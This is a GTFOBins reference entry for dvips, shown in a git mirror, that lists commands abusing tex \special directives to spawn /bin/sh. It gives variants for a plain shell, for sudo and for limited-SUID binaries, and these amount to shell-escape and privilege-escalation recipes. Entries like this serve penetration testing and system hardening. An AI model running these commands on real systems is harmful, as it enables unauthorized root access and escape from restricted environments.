1
0
mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2024-09-19 02:11:39 +02:00
GTFOBins.github.io/_gtfobins/dvips.md
2021-04-26 16:07:59 +02:00

17 lines
452 B
Markdown

---
description: The `texput.dvi` output file produced by `tex` can be created offline and uploaded to the target.
functions:
shell:
- code: |
tex '\special{psfile="`/bin/sh 1>&0"}\end'
dvips -R0 texput.dvi
sudo:
- code: |
tex '\special{psfile="`/bin/sh 1>&0"}\end'
sudo dvips -R0 texput.dvi
limited-suid:
- code: |
tex '\special{psfile="`/bin/sh 1>&0"}\end'
./dvips -R0 texput.dvi
---